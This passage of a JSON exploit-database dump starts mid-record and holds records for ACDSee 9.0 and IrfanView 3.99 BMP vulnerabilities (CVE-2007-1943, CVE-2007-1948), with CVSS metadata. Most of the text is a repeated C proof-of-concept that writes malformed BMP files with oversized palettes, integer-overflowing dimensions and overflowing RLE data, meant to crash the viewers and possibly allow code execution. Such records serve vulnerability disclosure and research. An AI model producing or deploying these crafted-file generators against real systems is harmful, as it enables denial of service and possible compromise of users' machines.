fopen(filename,\"wb\");\r\nfwrite(&sig,sizeof(sig),1,fp);\r\nfwrite(&fileheader,sizeof(BITMAPFILEHEADER),1,fp);\r\nfwrite(&infoheader,sizeof(BITMAPINFOHEADER),1,fp);\r\nif(palette) fwrite(palette,numpalettecolors*4,1,fp);\r\nfwrite(data,numdatabytes,1,fp);\r\nfclose(fp);\r\n}\r\n\r\nint main() {\r\nunsigned char * buf;\r\nbuf = (unsigned char *)malloc(4000000);\r\nmemset(buf,0,4000000);\r\nunsigned char * buf2;\r\nbuf2 = (unsigned char *)malloc(4000000);\r\nmemset(buf2,0,4000000);\r\n\r\n//overflows specifying too large palette\r\nwritebmp(\"ok8bit.bmp\",16,16,8,0,buf,256,buf,16*16);\r\nwritebmp(\"paletteof1.bmp\",16,16,8,0,buf,65535,buf,16*16);\r\nwritebmp(\"paletteof2.bmp\",16,16,8,0,buf,1000000,buf,16*16);\r\n\r\n//integer overflows with image dimensions\r\nwritebmp(\"ok24bit.bmp\",16,16,24,0,NULL,0,buf,16*16*4);\r\nwritebmp(\"wh4intof.bmp\",32769,32768,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"wh3intof.bmp\",37838,37838,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"w4intof.bmp\",1073741825,1,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"w3intof.bmp\",1431655767,1,24,0,NULL,0,buf,4000000);\r\n\r\n//overflows with RLE encoded BMPs\r\nbuf2[0]=16;\r\nbuf2[1]=0;\r\nwritebmp(\"okRLE.bmp\",16,1,8,1,buf,256,buf2,2);\r\nfor(long i=0;i<500000;i++) {\r\nbuf2[i*2]=255;\r\nbuf2[i*2+1]=0;\r\n}\r\nwritebmp(\"rle8of1.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nbuf2[0]=15;\r\nbuf2[1]=0;\r\nfor(long i=1;i<500000;i++) {\r\nbuf2[i*2]=255;\r\nbuf2[i*2+1]=0;\r\n}\r\nwritebmp(\"rle8of2.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nmemset(buf2,0,4000000);\r\nbuf2[0]=0;\r\nbuf2[1]=2;\r\nbuf2[2]=255;\r\nbuf2[3]=0;\r\nfor(long i=4;i<100000-1;) {\r\nbuf2[i]=0;\r\nbuf2[i+1]=254;\r\ni+=255;\r\n}\r\nwritebmp(\"rle8of3.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nmemset(buf2,0,4000000);\r\nfor(long i=0;i<100000-1;) {\r\nbuf2[i]=0;\r\nbuf2[i+1]=254;\r\ni+=255;\r\n}\r\nwritebmp(\"rle8of4.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\n} \r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29816/"}, {"lastseen": "2016-02-03T11:11:55", "osvdbidlist": ["34663"], "references": [], "edition": 1, "description": "ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities. CVE-2007-1943. Dos exploit for windows platform", "reporter": "Ivan Fratric", "published": "2007-04-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1943"], "modified": "2007-04-04T00:00:00", "id": "EDB-ID:29818", "href": "https://www.exploit-db.com/exploits/29818/", "sourceData": "source: http://www.securityfocus.com/bid/23317/info\r\n\r\nACDSee 9.0 Photo Manager is prone to multiple denial-of-service vulnerabilities because the application fails to properly handle malformed BMP image files.\r\n\r\nSuccessfully exploiting these issues allows attackers to crash the affected application. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.\r\n\r\nVersion 9.0 of the application is affected; other versions may also be vulnerable. \r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\r\nstruct BITMAPFILEHEADER {\r\nunsigned int bfSize;\r\nunsigned int bfReserved;\r\nunsigned int bfOffBits;\r\n};\r\n\r\nstruct BITMAPINFOHEADER {\r\nunsigned int biSize;\r\nunsigned int biWidth;\r\nunsigned int biHeight;\r\nunsigned short biPlanes;\r\nunsigned short biBitCount;\r\nunsigned int biCompression;\r\nunsigned int biSizeImage;\r\nunsigned int biXPelsPerMeter;\r\nunsigned int biYPelsPerMeter;\r\nunsigned int biClrUsed;\r\nunsigned int biClrImportant;\r\n};\r\n\r\nvoid writebmp(char *filename, unsigned long width, unsigned long height, unsigned int bpp, unsigned int compression, unsigned char *palette, long numpalettecolors, unsigned char *data, long numdatabytes) {\r\nBITMAPFILEHEADER fileheader;\r\nBITMAPINFOHEADER infoheader;\r\n\r\nmemset(&fileheader,0,sizeof(BITMAPFILEHEADER));\r\nmemset(&infoheader,0,sizeof(BITMAPINFOHEADER));\r\n\r\nunsigned char sig[2];\r\nsig[0] = 'B';\r\nsig[1] = 'M';\r\n\r\nfileheader.bfSize = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4+numdatabytes;\r\nfileheader.bfOffBits = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4;\r\n\r\ninfoheader.biSize = 40;\r\ninfoheader.biWidth = width;\r\ninfoheader.biHeight = height;\r\ninfoheader.biPlanes = 1;\r\ninfoheader.biBitCount = bpp;\r\ninfoheader.biCompression = compression;\r\ninfoheader.biClrUsed = numpalettecolors;\r\n\r\nFILE *fp = fopen(filename,\"wb\");\r\nfwrite(&sig,sizeof(sig),1,fp);\r\nfwrite(&fileheader,sizeof(BITMAPFILEHEADER),1,fp);\r\nfwrite(&infoheader,sizeof(BITMAPINFOHEADER),1,fp);\r\nif(palette) fwrite(palette,numpalettecolors*4,1,fp);\r\nfwrite(data,numdatabytes,1,fp);\r\nfclose(fp);\r\n}\r\n\r\nint main() {\r\nunsigned char * buf;\r\nbuf = (unsigned char *)malloc(4000000);\r\nmemset(buf,0,4000000);\r\nunsigned char * buf2;\r\nbuf2 = (unsigned char *)malloc(4000000);\r\nmemset(buf2,0,4000000);\r\n\r\n//overflows specifying too large palette\r\nwritebmp(\"ok8bit.bmp\",16,16,8,0,buf,256,buf,16*16);\r\nwritebmp(\"paletteof1.bmp\",16,16,8,0,buf,65535,buf,16*16);\r\nwritebmp(\"paletteof2.bmp\",16,16,8,0,buf,1000000,buf,16*16);\r\n\r\n//integer overflows with image dimensions\r\nwritebmp(\"ok24bit.bmp\",16,16,24,0,NULL,0,buf,16*16*4);\r\nwritebmp(\"wh4intof.bmp\",32769,32768,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"wh3intof.bmp\",37838,37838,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"w4intof.bmp\",1073741825,1,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"w3intof.bmp\",1431655767,1,24,0,NULL,0,buf,4000000);\r\n\r\n//overflows with RLE encoded BMPs\r\nbuf2[0]=16;\r\nbuf2[1]=0;\r\nwritebmp(\"okRLE.bmp\",16,1,8,1,buf,256,buf2,2);\r\nfor(long i=0;i<500000;i++) {\r\nbuf2[i*2]=255;\r\nbuf2[i*2+1]=0;\r\n}\r\nwritebmp(\"rle8of1.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nbuf2[0]=15;\r\nbuf2[1]=0;\r\nfor(long i=1;i<500000;i++) {\r\nbuf2[i*2]=255;\r\nbuf2[i*2+1]=0;\r\n}\r\nwritebmp(\"rle8of2.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nmemset(buf2,0,4000000);\r\nbuf2[0]=0;\r\nbuf2[1]=2;\r\nbuf2[2]=255;\r\nbuf2[3]=0;\r\nfor(long i=4;i<100000-1;) {\r\nbuf2[i]=0;\r\nbuf2[i+1]=254;\r\ni+=255;\r\n}\r\nwritebmp(\"rle8of3.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nmemset(buf2,0,4000000);\r\nfor(long i=0;i<100000-1;) {\r\nbuf2[i]=0;\r\nbuf2[i+1]=254;\r\ni+=255;\r\n}\r\nwritebmp(\"rle8of4.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\n} \r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29818/"}, {"lastseen": "2016-02-03T11:12:03", "osvdbidlist": ["41554"], "references": [], "edition": 1, "description": "IrfanView 3.99 Multiple BMP Denial of Service Vulnerabilities. CVE-2007-1948. Dos exploit for windows platform", "reporter": "Ivan Fratric", "published": "2007-04-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1948"], "modified": "2007-04-04T00:00:00", "id": "EDB-ID:29819", "href": "https://www.exploit-db.com/exploits/29819/", "sourceData": "source: http://www.securityfocus.com/bid/23318/info\r\n\r\nIrfanView is prone to multiple denial-of-service vulnerabilities because the application fails to properly handle malformed BMP image files.\r\n\r\nSuccessfully exploiting these issues allows attackers to crash the affected application. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.\r\n\r\nIrfanView 3.99 is affected; other versions may also be vulnerable. \r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\r\nstruct BITMAPFILEHEADER {\r\nunsigned int bfSize;\r\nunsigned int bfReserved;\r\nunsigned int bfOffBits;\r\n};\r\n\r\nstruct BITMAPINFOHEADER {\r\nunsigned int biSize;\r\nunsigned int biWidth;\r\nunsigned int biHeight;\r\nunsigned short biPlanes;\r\nunsigned short biBitCount;\r\nunsigned int biCompression;\r\nunsigned int biSizeImage;\r\nunsigned int biXPelsPerMeter;\r\nunsigned int biYPelsPerMeter;\r\nunsigned int biClrUsed;\r\nunsigned int biClrImportant;\r\n};\r\n\r\nvoid writebmp(char *filename, unsigned long width, unsigned long height, unsigned int bpp, unsigned int compression, unsigned char *palette, long numpalettecolors, unsigned char *data, long numdatabytes) {\r\nBITMAPFILEHEADER fileheader;\r\nBITMAPINFOHEADER infoheader;\r\n\r\nmemset(&fileheader,0,sizeof(BITMAPFILEHEADER));\r\nmemset(&infoheader,0,sizeof(BITMAPINFOHEADER));\r\n\r\nunsigned char sig[2];\r\nsig[0] = 'B';\r\nsig[1] = 'M';\r\n\r\nfileheader.bfSize = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4+numdatabytes;\r\nfileheader.bfOffBits = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4;\r\n\r\ninfoheader.biSize = 40;\r\ninfoheader.biWidth = width;\r\ninfoheader.biHeight = height;\r\ninfoheader.biPlanes = 1;\r\ninfoheader.biBitCount = bpp;\r\ninfoheader.biCompression = compression;\r\ninfoheader.biClrUsed = numpalettecolors;\r\n\r\nFILE *fp = fopen(filename,\"wb\");\r\nfwrite(&sig,sizeof(sig),1,fp);\r\nfwrite(&fileheader,sizeof(BITMAPFILEHEADER),1,fp);\r\nfwrite(&infoheader,sizeof(BITMAPINFOHEADER),1,fp);\r\nif(palette) fwrite(palette,numpalettecolors*4,1,fp);\r\nfwrite(data,numdatabytes,1,fp);\r\nfclose(fp);\r\n}\r\n\r\nint main() {\r\nunsigned char * buf;\r\nbuf = (unsigned char *)malloc(4000000);\r\nmemset(buf,0,4000000);\r\nunsigned char * buf2;\r\nbuf2 = (unsigned char *)malloc(4000000);\r\nmemset(buf2,0,4000000);\r\n\r\n//overflows specifying too large palette\r\nwritebmp(\"ok8bit.bmp\",16,16,8,0,buf,256,buf,16*16);\r\nwritebmp(\"paletteof1.bmp\",16,16,8,0,buf,65535,buf,16*16);\r\nwritebmp(\"paletteof2.bmp\",16,16,8,0,buf,1000000,buf,16*16);\r\n\r\n//integer overflows with image dimensions\r\nwritebmp(\"ok24bit.bmp\",16,16,24,0,NULL,0,buf,16*16*4);\r\nwritebmp(\"wh4intof.bmp\",32769,32768,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"wh3intof.bmp\",37838,37838,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"w4intof.bmp\",1073741825,1,24,0,NULL,0,buf,4000000);\r\nwritebmp(\"w3intof.bmp\",1431655767,1,24,0,NULL,0,buf,4000000);\r\n\r\n//overflows with RLE encoded BMPs\r\nbuf2[0]=16;\r\nbuf2[1]=0;\r\nwritebmp(\"okRLE.bmp\",16,1,8,1,buf,256,buf2,2);\r\nfor(long i=0;i<500000;i++) {\r\nbuf2[i*2]=255;\r\nbuf2[i*2+1]=0;\r\n}\r\nwritebmp(\"rle8of1.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nbuf2[0]=15;\r\nbuf2[1]=0;\r\nfor(long i=1;i<500000;i++) {\r\nbuf2[i*2]=255;\r\nbuf2[i*2+1]=0;\r\n}\r\nwritebmp(\"rle8of2.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nmemset(buf2,0,4000000);\r\nbuf2[0]=0;\r\nbuf2[1]=2;\r\nbuf2[2]=255;\r\nbuf2[3]=0;\r\nfor(long i=4;i<100000-1;) {\r\nbuf2[i]=0;\r\nbuf2[i+1]=254;\r\ni+=255;\r\n}\r\nwritebmp(\"rle8of3.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\nmemset(buf2,0,4000000);\r\nfor(long i=0;i<100000-1;) {\r\nbuf2[i]=0;\r\nbuf2[i+1]=254;\r\ni+=255;\r\n}\r\nwritebmp(\"rle8of4.bmp\",16,1,8,1,buf,256,buf2,1000000);\r\n} \r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29819/"}]}
